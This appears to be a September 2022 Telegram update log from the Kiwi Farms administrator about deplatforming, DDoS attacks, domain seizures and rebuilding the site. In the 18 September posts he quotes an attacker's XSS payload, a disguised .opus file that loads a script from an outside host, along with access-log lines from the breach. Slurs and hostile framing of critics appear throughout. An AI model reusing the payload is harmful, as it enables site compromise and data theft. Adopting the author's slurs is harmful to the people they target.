Cloudflare's decision to block the site was done without any discussion. The message I've received is a vague suspension notice. The message from Matthew Prince is unclear. If there is any threat to life on the site, I have received no communication from any law enforcement.
It is early morning hours here. I am going to repair the Tor URL tonight before going back to bed. My thoughts will be articulated better in the morning.
- 03 September 2022 (1 messages)
-
- 04 September 2022 (2 messages)
-
<https://kiwifarms.ru>
<http://uquusqsaaad66cvub4473csdu4uu7ahxou3zqc35fpw5d4ificedzyqd.onion/>
.ONION URLs can only be opened with Tor.
<https://www.torproject.org/> can access Tor, or
<https://brave.com/> and open a Tor tab with ALT+SHIFT+N
There's various issues with both mirrors. I can't do anymore tonight. -
Matthew Prince lied.
https://kiwifarms.ru/threads/matthew-prince-lied.128900/ - 05 September 2022 (2 messages)
-
DDoS-Guard abruptly terminated service.
-
In my life, there is a family emergency. It has absolutely nothing to do with the forum drama. I cannot and will not elaborate further. There will be a week or more where I am completely unavailable and it is likely the site will go down during this time where I will not be able to bring it up.
I want to appraise our situation frankly.
Domain Registrar
Cloudflare was both our application-level DDoS mitigation and our domain registrar. They have given me a way to transfer my domains to another registrar. I do not know what registrar to send it to because I do not have faith in any company.
DDoS Mitigation
DDoS-Guard will drop us dropped us while I was writing this post. This meme about Russia being a free country is a joke. The US is a free country, but with no stewards to protect it. Without the US, there is no second best. I did not expect Cloudflare to crumple so quickly and I don't have a Plan C for DDoS mitigation.
Resource Allocation
I own IP addresses. Our IP allocation is from APNIC. APNIC is one of the 5 private companies which allocate Internet resources around the world. APNIC happens to be based out of Australia, which recently passed draconian censorship laws. There is an effort to get our RIR to revoke our allocation. This would be unprecedented in the history of the Internet, and considering China is in APNIC's region, an absolutely horrific standard which will echo throughout the upcoming decades. There is a non-zero chance of this happening.
Hosting
We have one host and I am looking at two more. It is likely that the host will give up too. The two hosts confident they can handle the Kiwi Farms are probably wrong. DDoS-Guard was confident they could handle the Kiwi Farms and said "bring it on" for less than 24 hours.
This is an organized attack. There is a coalition of criminals trying to frame the forum for their behavior. These criminals provide opportunities for professional victims to amplify their message. Journalists canonize the crimes as the behavior of the forum itself, which becomes the effective truth for the general public.
This is a machine that was built up formerly against 8chan and activates any time the cathedral wants to test the new fronts of its censorship. It is a massive amalgamation of various interests. I am one person. The financial limitations aren't even the real problem - the problem is, I am powerless alone. There is no amount of money I can throw to convince people to be brave and be free. This is just the reality of our country.
And what this machine will not accept is compromise. If I censored specific kinds of behavior, it would not matter. They don't want a specific thing censored. They want the average person to be able to speak in channels where only specific thoughts are acceptable.
More importantly, they want to make it so that no small organization can host a service which threatens the cathedral. It used to be that one guy with a good idea could open a platform and be a Tom Anderson, Mark Zuckerberg, Tom Fulp, Christopher Poole, or Richard Kyanka. Take note these names are all from 10+ years ago. There are no new groundbreakers online anymore because breaking ground in the new Internet's corporate parking lot is not allowed.
I do not see a situation where the Kiwi Farms is simply allowed to operate. It will either become a fractured shell of itself, like 8chan, or jump between hosts and domain names like Daily Stormer.
http://uquusqsaaad66cvub4473csdu4uu7ahxou3zqc35fpw5d4ificedzyqd.onion/threads/the-endless-drum-beating.129023/
Accessible via <https://www.torproject.org/download/> OR
Press ALT+SHIFT+N on Brave <https://brave.com/download/>The Tor Project | Privacy & Freedom OnlineDefend yourself against tracking and surveillance. Circumvent censorship.
- 06 September 2022 (5 messages)
-
https://kiwifarms.top/
我很高兴地宣布我们重新上线了。别问我多久!
The site is down because there's something wrong with the .TOP domain. We are maneuvering. -
I made the allegation that compromised accounts with weak passwords were being used to post violent threats instead of actual community members. I'd like to prove this.
1. We are receiving hundreds of login attempts a second from automated traffic.
2. hCaptcha, the tool we used to help mitigate bot traffic on the login page, received enough complaints from the mob that they dropped us, making it significantly more difficult to deal with this threat.
This is an organized framing campaign and no matter what happens I want you to know these people are fucking scum and should never be given the benefit of a doubt. -
-
I've done all I can for tonight, so here's your sitrep:
https://kiwifarms.top is up for IPv6 chads ONLY (i.e. your phone probably can open it). I don't know why.
The onion is up.
http://uquusqsaaad66cvub4473csdu4uu7ahxou3zqc35fpw5d4ificedzyqd.onion/ -
I don't like addressing Twitter retards but I love this tweet because it's so mask off.
This has not a single thing to do with the purported causus belli: swatting, irl harassment, or 'justice' for anyone - these are all lies.
It's about deranged perverts memory holing their tweets where they said they wanted to rape women.
I'm not going to lie and say I know for sure we'll make it through this absolute shitstorm (you don't know the half of it: there are bloomberg journos digging through my attorney's trashbins).
However, I recommit to this promise:
If I deem the site a total loss, I will anonymize the forum content and put it in a torrent. Every single person who wants a complete copy of all 7TiB of forum data will be able to get it and do whatever they want with it.
I'll even provide a little handbook with things I've learned over the years and some advice.
After all, I inherited the forum myself. - 07 September 2022 (1 messages)
-
I have had an extraordinarily promising phonecall and I am filled with unbridled optimism.
- 08 September 2022 (3 messages)
-
-
TL;DR:
1. KF is up for now via Tor or .top to mobile users.
2. Sister services impacted by the Cloudflare drop are being worked on,
3. My week off that I warned about is still looming,
4. Expect good news soon, what I teased yesterday is still coming.
The site is available again on https://kiwifarms.top (IPv6 Only, Mobile Networks) and on Tor via http://uquusqsaaad66cvub4473csdu4uu7ahxou3zqc35fpw5d4ificedzyqd.onion/
When Cloudflare dropped service, they did so without allowing me any time to prepare for it. A lot of services that usually run uninterrupted have been down for a few days. Bringing them up means manually reconfiguring their DNS records without having the old Cloudflare records as reference.
It's a very annoying process, and one which could have been avoided if Cloudflare allowed me even a day to get things in order. It's worth noting how even a little professional courtesy would have went miles. Instead, Prince decided to pull the bullshit he did and cite a nonexistent emergency which I've still received zero LEO inquiries about.
That said, https://kiwifarms.cc is now also up and I'm working to get the email reconfigured so that outbound messages for password resets can get going again. I know they're broken - please stop emailing me about it, I can't even reply.
There's a lot of frustrating things about this situation and I'll probably vent more tomorrow during my stream (which is still happening at its usual time on Odysee - join https://t.me/mationair for announcements).
Stay optimistic, stay busy, and ignore retards on Twitter. -
- 10 September 2022 (4 messages)
-
We have officially lost our first domain - ISNIC (Iceland) has seized kiwifarms.is
-
https://kiwifarms.st/
Courtesy of the great African nation of São Tomé and Príncipe. Poast wants to see if .st holds up, so lets see.
Onion Farms chads have stayed winning. Download Tor browser or Brave and connect to:
http://uquusqsaaad66cvub4473csdu4uu7ahxou3zqc35fpw5d4ificedzyqd.onion/
The .TOP domain has been unreliable. -
There's an ongoing 10Gbps+ DDoS attack. The site will be onion online over the weekend at least.
Edit: https://kiwifarms.top is now up. -
Okay, Tor's back up, hopefully it will stay up for the weekend. I'm not touching anything and leaving well enough alone.
I'm really sorry for the downtime. It's mostly my fault. I'm having to learn a lot on the fly and my ability to reach out for help is really limited because I can't expose information about the network due to the persistent threats. Luckily, my circle of confidants is growing slowly and my options are broadening.
Next week I'm going to get this shit working no matter what. We've had a nice dirt nap, and it's time to come back.
Up as of 6am US East:
https://kiwifarms.top (appears to be down again due to Vanwa)
http://uquusqsaaad66cvub4473csdu4uu7ahxou3zqc35fpw5d4ificedzyqd.onion/ (speed of site depends heavily on your circuit - if it's particularly bad, try reconnecting Tor) - 11 September 2022 (2 messages)
-
I have determined my Google Voice number has been blocked. I've not been notified of any action against my account, but I cannot receive any texts or phonecalls. I've been expecting calls on that number for literally a week, sms verification codes I need, and wondering why I wasn't getting them. The the last I received was on Tuesday.
-
A DDoS attack was penetrating Vanwa's shield on kiwifarms.top, so I have turned off that frontend to see if the .onion will stay up. The .onion is also being hit, but not as hard, and it appears mitigated.
Edit: I lied, there's about 850r/s coming in through Tor bypassing the screen.
To reiterate, I am expecting improvements in the situation next week. - 12 September 2022 (1 messages)
-
Monday status report.
I've redone the backend of the Tor network. This is our new domain. The old domain will soon stop working. Do not use any other domain to connect to the Kiwi Farms by Tor. I am hoping the new Tor setup will be more robust than the old one.
http://kiwifarmsaaf4t2h7gc3dfc5ojhmqruw2nit3uejrpiagrxeuxiyxcyd.onion/
.TOP through Vanwa might be coming back today.
https://kiwifarms.top/
The FCC has responded to my complaint that Google Voice has unlawfully terminated a common carrier service. Google has 30 days to reply to the FCC in writing.
ISNIC has indicated they will return my domains to me if I verify my WHOIS records.
I am awaiting a replacement router which will be a breakthrough in our overall reliability. Insh'allah, it will come today. - 13 September 2022 (1 messages)
-
Brace for downtime: the router of legends, 8 months in the making, is being installed today.
- 14 September 2022 (2 messages)
-
The site is back up via Tor but not in better condition than it was before it went down.
http://kiwifarmsaaf4t2h7gc3dfc5ojhmqruw2nit3uejrpiagrxeuxiyxcyd.onion/
In short: We installed a new router because our new DDoS-filtered Internet is on a 10Gbps line, which requires a special cable. Our old router did not have a port for the cable, so we had to get a new one. Unfortunately, the new Internet does not work.
It took 3 hours before I could even begin looking at the router. It was quickly determined that the line DDoS filtering was not set up correctly and the details I received were incorrect. I've filed tickets on some god-forsaken enterprise customer support desk and I'm awaiting a reply, which is all I can do. It's now EoB in Pacific time, so this wont get done today. The rest of the time has been trying to find a way to get the onion back up before I went to bed.
The good news is that, theoretically, once the new hookup is actually working, we should be able to easily get it running without more downtime.
The bad news is, I do not know how long that's going to take. I am going to continue annoying every avenue of communication I can find until we get what we need and what I have paid for.
This whole process has been extremely cursed. I ordered DDoS protection after the DDoS attacks from Byuu's fans last year in December, but scheduling it to be set up took months. I ordered a router with a 10Gbps port in March, which arrived in May (because of the microchip shortage). The new service wasn't actually set up until July. In between May and July, my new router vanished from storage. When the DDoS attacks started up again in August, I had to source a new router. Now, we're back to the service set up in July not actually working while the router does.
Needless to say, I am exhausted. It's very early in the morning and I really wish this shit just worked. I can handle insane people being insane, but I am truly fed up with companies. All of the recent downtime has been due to a moderate amount of pressure and shit I need to work, and have been trying to get put together for almost an entire calendar year, simply not being there when it needs to be. -
.ST is up again. if the page looks broken, clear your cache (CTRL+F5)
https://kiwifarms.st
http://kiwifarmsaaf4t2h7gc3dfc5ojhmqruw2nit3uejrpiagrxeuxiyxcyd.onion/
I am not satisfied waiting so I have a new strategy with the Clearnet. My strategy is to get proxy servers up on a bunch of reputable 'bulletproof' hosts and trial them by fire. Since the people-of-gender enjoy writing emails, I am going to put together a comprehensive list of hosts and domain registrars to give them work to do and see what is actually worth a shit. - 15 September 2022 (2 messages)
-
Confirmed: Chinese company .top has killed kiwifarms.top
-
https://kiwifarms.net is back up under DiamWall. (Errors? CTRL+F5, refresh cache, flush DNS.)
https://kiwifarms.st is my main proof-of-concept of a more robust Kiwi Farms. It's under attack and struggling right now but I will continue to tune it, expand it, and make it more resilient.
http://kiwifarmsaaf4t2h7gc3dfc5ojhmqruw2nit3uejrpiagrxeuxiyxcyd.onion still works but may go down for maintenance. I'm trying to force Crunklord to do all my work for me with the onion because it annoys me. There's Tor DDoS mitigator that works great I am forcing him to install asap.
The journos are working overdrive to try and take down the new DDoS mitigator. They may succeed - DiamWall are communicative and friendly people who want to protect free speech online, but have worked hard on a good product that they don't want to see destroyed right out the gate. They are only European, after all.
REGARDING @kiwifarmschat, I am interested in closing it. It is a serious source of mental retardation and despite the best efforts of the anime avatars who are running it, there is so much deliberate fedposting and falseflagging going on. It will only stop if the channel has nothing to do with the Kiwi Farms.
On that note, I am probably going to lock it with a message that directs people to other Telegram chats that want to deal with a bunch of autistics. - 16 September 2022 (2 messages)
-
Good morning everyone. I sure hope Europeans haven't let everybody down again.
-
A confused old man believes he owns the Kiwi Farms for some reason. In case anyone is concerned: no, it's not true.
To the evil person who accepted Bitcoin from this elderly person and sold him a piece of napkin with "owner of kiwi farms" written on it in crayon, you should be ashamed of yourself. It's not fair to take advantage of our society's most vulnerable. - 18 September 2022 (4 messages)
-
Yesterday, Vsys, a host we used as a forward-proxy, was compromised.
Today, the site was hacked to change everyone's avatars to logos of another site (which I am not naming because I'm not sure what the motivation is behind it).
Then, each node on the forum index was deleted one at a time.
There are backups of the site so no information is permanently lost but I have not diagnosed what the attack vector was yet or the extent of the breach. -
This statement regards user impact.
- Assume your password for the Kiwi Farms has been stolen.
- Assume your email has been leaked.
- Assume any IP you've used on your Kiwi Farms account in the last month has been leaked.
The attacker had access to my admin account, probably through session hijacking (bypassing password and 2fa). He would have been able to access user data, and XenForo provides a way to export user lists with information that is precisely: email, username, last acitivity, register date, user state (banned/unverified), post count, and if they are staff.
However,
2a03:e600:100::31 - - [18/Sep/2022:08:16:13 +0000] "GET /admin.php?users/list-export&export=1 HTTP/2.0" 500 0 "https://kiwifarms.st/admin.php?users/list" "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0"
In this access.log entry for the only attempt made to export this information, he tried to export 120k+ users at once. This caused it to crash and respond Error 500. No other attempt was made to export the user list. It's unclear if he obtained any user information.
I am still deducing the attack vector. I currently have two theories that I will explain later. -
The issue was a script injection. I am working on the details. Here is my challenge to any hackers or aspiring hackers.
There is a file called troonshine.opus, with the contents of this:
<!DOCTYPE html>
<script src=//poz.hiv/load.js></script>
The web document, on the same domain, has a CORS rule that looks like this:
<meta http-equiv="Content-Security-Policy" content="script-src 'self' 'nonce-0113ffa9cf5af884e070dd1e36188e5db5ba4bbdacaef1c21a733cea089a7fce'" />
What could you possibly put into that document to get it to load the .opus and have the script execute?
The more finer details are this: XenForo does not validate any file contents. You can write an .opus file that is basically just an HTML document loading a script off-site and if you somehow open it, it does run. I have confirmed this.
The question is of how it got injected. The chat on Kiwi Farms was a Rust websocket chat that was part of a forum rewrite I had been working on. Relevant source:
https://github.com/jaw-sh/ruforo/blob/master/src/bin/xf_chat/main.rs
https://github.com/jaw-sh/ruforo/blob/master/resources/js/chat.js
https://github.com/jaw-sh/ruforo/tree/master/src/bbcode
What baffles me is that even if we did theoretically pass the client a message that was simply instruction to load another script, it should not work, because the security policy of the chat explicitly says that no scripts should run — EVEN FROM THE SAME DOMAIN — unless they are given a nonce token. I know it happened in the chat, though, because I found the access.log entry where it gets opened:
x.x.x.x - - [18/Sep/2022:03:03:53 -0400] "GET /data/audio/3696/3696202-c63cc36fd4acb874fdebd0b3988c3410.opus HTTP/1.1" 200 90 "https://kiwifarms.st/test-chat?style=dark" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
So what can be done to make an .opus media file load as an inline web document which can execute its own scripts that violate the CORS of the web document it's loaded into? I just don't understand.
<jcmoon@pm.me>
P.S. If you're going to write me and take credit for the attack, include the name of the random user you made an admin.
Edit: I believe that the .opus file with the xss payload was injected via an iframe that was somehow added to chat. I don't know how they rendered an iframe but that would work. -
A consolidated statement is now on https://kiwifarms.net/
- 19 September 2022 (1 messages)
-
I just got the call. I'll be gone for a week.
Telegram chat is now under anime avatar martial law. Don't bother appealing bans.
I was hoping to get the site stable before now, but man plans, God laughs.
See you soon. - 20 September 2022 (1 messages)
-
I am still dealing with IRL problems but I have two announcements to make.
1. My mailing address at 913 Beal Parkway has been terminated. If you sent mail there, you will receive a return to sender.
Edit: This has been corrected.
2. Lolcow LLC's agent from WyomingAgents.com - which I have used for half a decade now - is terminating me. Their reason for this is a bullshit "ties to Russia". Their cited sanction only applies to forming businesses for Russian citizens/companies, which I am not. My only ties to Eastern Europe at this point are in Kyiv.
They have gone after my attorneys recently and now they're going after my agents. They do not want me to have legal representation, a mailing address, or a phone number.
I don't know what the outlook for the site is, but I hope you all realize by now that they won't stop at taking down websites. They want you to fucking die. - 23 September 2022 (1 messages)
-
I'm going to take the weekend off.
On Monday, I am going to start reformatting, rebuilding, and fortifying the setup. I don't know if that means the site will be up Monday.
Over the week, I've managed to file some tickets to get work done with the networking/router but that's _still_ not 100% setup yet.
I've thought about how I want to secure the forum moving forward and I will explain that later.
Regarding the breach,
- I've not seen any verification of a leak of username / email addresses.
- I've decided I will not allow account deletion when the site comes back up.
Since the hack in 2019, the registration warning was written with two things in mind:
1. That if the site goes down suddenly I can communicate with users.
2. That if the site gets hacked there should be nothing to leak.
This includes banning work and education emails, providing guides on how to maintain your digital privacy, encouraging forwarding emails instead of throwaways, and generally reminding people to practice info hygiene as much as possible.
I really hope this incident, regardless of its long term consequences and the fate of the site as a whole, reminds people that we are - as Curtis Yarvin likes to say - "prey animals". If you want to enjoy free discussion (regardless of how and where), you are not in power. You must abide by certain legal limitations, or the government hammer falls on you. If you abide by legal limitations but piss off too many people, the criminal hammer falls on you and the government will let it happen.
That is to say, you're being observed and hunted at the same time, so act like it. Take your digital presence seriously or you'll have to deal with the freaks trying to scare people into submission. - 26 September 2022 (1 messages)
-
A lot of standard setup I was hoping to breeze through has ended up consuming much more time than I would have liked. As I mentioned, I reformatted everything and what I didn't reformat I've upgraded to latest versions. Configuring everything again is taking longer than expected.
The list looks like this. They're in order by how they should be done, but coincidentally also complexity. A lot of things are half configured at this point.
✔️ Backup database restored.
✔️ Files synchronized.
✔️ Self-hosted DNS.
❌ Primary web servers configured.
❌ Secondary web servers configured.
❌ Tertiary web servers configured.
❌ DNS round-robin with healthchecks.
❌ Automated backups reconfigured.
❌ Email server NS records working.
❌ Mass mandatory password reset.
❌ GamerGate 2
(If you're concerned about the password reset, I don't know what to tell you. I have to reset the passwords and I explicitly warned you not to use a throwaway because you would eventually need to reset your password. Figure out what a fucking password manager is, good lord.)
See you tomorrow. - 27 September 2022 (2 messages)
-
Currently testing different methods of proof-of-work application layer DDoS mitigation (i.e. something like the Cloudflare interstitial page). A lot of what I'm seeing doesn't properly work with subdomains. I've moved all the UGC off to a new subdomain, so it's important that each subdomain does not have its own interstitial page as avatars/attachments would never load.
If you are familiar with PowerDNS please contact me on Poast. I am having trouble getting the ifurlup check working as I'd like.
✔️ Backup database restored.
✔️ Files synchronized.
✔️ Self-hosted DNS
✔️ Primary web servers configured.
❌ Secondary web servers configured.
✔️ Tertiary web servers configured.
❌ DNS round-robin with healthchecks.
❌ Automated backups reconfigured.
✔️ Email server NS records set.
❌ Mass mandatory password reset.
❌ Tor .onion hidden service.
❌ GamerGate 2 -
The Kiwi Farms is now up via <https://kiwifarms.net> only. If you sign in, you will need to reset your password by email. There is no away around this and I cannot help you. Lolcow Email is back up if you used that for your email service.
The Onion is not ready and there are strange timeouts related to logins which are pretty frustrating. I'm still trying to sort everything out.
Now that I've announced this, don't be surprised if there's DDoS attacks that cause some downtime. I'll start combatting issues as they come up again.
If the .net is not working for you, you should change your DNS. Google "how to use google dns". - 28 September 2022 (1 messages)
-
Hello again. I'm happy with the site's stability but some users are having problems. Here's a checklist for getting on the site if you currently cannot. The login and password reset issues should be completely fixed. If you're still having issues, email <null@kiwifarms.net>.
1. Clear your cache.
CTRL+F5 on Desktop.
Clear browsing data (cached files) on phones.
2. Use custom DNS.
On Desktop, search "how to use google dns".
For mobile users, check out https://1.1.1.1
More info: <https://www.privacyguides.org/dns/>
3. Change your VPN node.
If you are using a VPN and cannot connect, change nodes.
Make sure your VPN is using safe 3rd party DNS provider because they will override your DNS to use their own. VPN DNS is usually safe on its own, too.
My plans moving forward are to continue improving stability, increasing redundancy, and changing the WAF to another proof-of-work system that's currently being used on Tor (not ready yet).
The momentum against us has been slowed to a crawl. I sometimes get copies of complaint emails sent to providers, and only the most desperate clinger-ons are still going. They are basically just saying "it's a bad site, google it".
Thanks for hanging in there. I know it's been rough. - 29 September 2022 (4 messages)
-
I'm happy to announce Onion Farms is back up in case you're interested in using it. It seems to run faster than clearnet at the moment.
I am also trialing a PoW system that may end up replacing the clearnet mitigation too.
http://kiwifarmsaaf4t2h7gc3dfc5ojhmqruw2nit3uejrpiagrxeuxiyxcyd.onion/
(This is the ONLY URL we use. Do not use any other.)
If you have any issues, feel free to email me at null@kiwifarms.net
Have a great Thursday frens. -
I have replaced the bot check server on kiwifarms.net with a new set of servers using a new bot checking tool. It is the same one used on the .onion and is very fast. The site is now running as fast as it did on Cloudflare for me.
If you're having any troubles and can't access the site, you can email me.
(Edit: The downtime was due to something crashing. I'm keeping tabs on stuff. Sorry if it crashes overnight.) -
There was a DDoS attack that caused the site to become unavailable for an hour while I watched a movie. They tried again just now but did not succeed in bringing the service down entirely, so they've stopped. I can actually see in real time them stopping their attacks, reconfiguring it, and trying a different approach.
-
The attack is two-fold:
1) They are hitting the network on all the frontends we use on different services.
2)They are also hitting the antibot page as hard as they can via Tor.
This is a lot of resources being expended and since it's past midnight here I've done everything I can for tonight. I know what they're up to and will work on it tomorrow.